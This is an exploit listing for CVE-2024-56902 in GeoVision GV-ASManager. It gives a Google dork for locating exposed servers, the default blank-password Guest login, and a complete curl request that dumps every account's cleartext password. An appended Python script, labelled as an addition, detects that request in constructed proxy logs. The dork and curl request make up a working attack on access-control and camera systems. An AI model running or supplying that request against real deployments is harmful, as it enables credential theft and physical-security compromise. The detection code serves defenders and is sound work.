## https://sploitus.com/exploit?id=PACKETSTORM:190344
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
    # Google Dork: inurl:"ASWeb/Login"
    # Date: 02-FEB-2025
    # Exploit Author: Giorgi Dograshvili [DRAGOWN]
    # Vendor Homepage: https://www.geovision.com.tw/
    # Software Link: https://www.geovision.com.tw/download/product/
    # Version: 6.1.0.0 or less
    # Tested on: Windows 10 | Kali Linux
    # CVE : CVE-2024-56902
    # PoC: https://github.com/DRAGOWN/CVE-2024-56902
    
    
    Information disclosure vulnerability in the GeoVision GV-ASManager web application, version 6.1.0.0 or less.
    
    Requirements
    To perform a successful attack, an attacker requires:
    - GeoVision ASManager version 6.1.0.0 or less
    - Network access to the GV-ASManager web application (in some cases it is publicly accessible)
    - Access to the Guest account (enabled by default), or any low-privilege account (Username: Guest; Password: <blank>)
    
    Impact
    The vulnerability can be leveraged to perform the following unauthorized actions:
    A low-privilege account is able to:
    - Enumerate user accounts
    - Retrieve the cleartext password of any account in GV-ASManager.
    After reusing the retrieved password, an attacker will be able to:
    - Access resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
    - Make changes to data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
    - Disrupt and disconnect services such as monitoring cameras and access controls.
    - Clone and duplicate access control data for further attack scenarios.
    - Reuse the retrieved password in other digital assets of the organization.
    
    cURL script:
    
    curl --path-as-is -i -s -k -X $'POST' \
        -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
       -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
        --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
        $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
    
    
    After a successful attack, you will get access to:
    - ASWeb - Access & Security Management
    - TAWeb - Time and Attendance Management
    - VMWeb - Visitor Management
    - ASManager - Access & Security Management software in OS
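
A defender's check for the request shown above, as an added example that is not part of the original advisory or the author's PoC: it scans constructed reverse-proxy log records for POSTs to `ASWebCommon.srf` carrying `action=UA_GetAllUserAccount`. The JSON field names and the premise that the proxy logs request bodies are assumptions, and the path and action are matched case-insensitively as a precaution.

```python
import json
import posixpath
from urllib.parse import parse_qs, unquote

# Endpoint and action taken from the request shown in this advisory,
# lowercased because both are compared case-insensitively as a precaution.
ENDPOINT = "/asweb/bin/aswebcommon.srf"
ACTION = "ua_getalluseraccount"

# Constructed sample records. The JSON field names are assumptions about a
# reverse proxy or WAF that logs POST bodies, not a GV-ASManager log format.
SAMPLE_LOG = """\
{"ts":"2025-02-02T10:00:01Z","src":"192.0.2.10","method":"POST","path":"/ASWeb/bin/ASWebCommon.srf","body":"action=UA_GetAllUserAccount&node=xnode-98"}
{"ts":"2025-02-02T10:00:07Z","src":"198.51.100.7","method":"POST","path":"/ASWeb/bin/../bin/aswebcommon.srf","body":"node=xnode-98&action=UA%5FGetAllUserAccount"}
{"ts":"2025-02-02T10:00:09Z","src":"192.0.2.10","method":"POST","path":"/ASWeb/bin/ASWebCommon.srf","body":"action=ConstructedOtherAction"}
{"ts":"2025-02-02T10:00:12Z","src":"192.0.2.44","method":"GET","path":"/ASWeb/Login","body":""}
truncated or non-JSON line
"""

def normalise_path(raw):
    """Drop the query, percent-decode, collapse dot segments, lowercase."""
    path = unquote(raw.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def is_account_listing(rec):
    """True for a POST to the endpoint whose body asks for all accounts."""
    if str(rec.get("method", "")).upper() != "POST":
        return False
    if normalise_path(str(rec.get("path", ""))) != ENDPOINT:
        return False
    params = parse_qs(str(rec.get("body", "")), keep_blank_values=True)
    return any(v.lower() == ACTION for v in params.get("action", []))

def find_hits(log_text):
    """Return (timestamp, source) for every matching record."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not valid JSON
        if isinstance(rec, dict) and is_account_listing(rec):
            hits.append((rec.get("ts"), rec.get("src")))
    return hits

if __name__ == "__main__":
    for ts, src in find_hits(SAMPLE_LOG):
        print(f"{ts} {src} requested the full account list")
```

Tying each hit to the account behind the session (for example Guest) depends on whatever identity data the log source records.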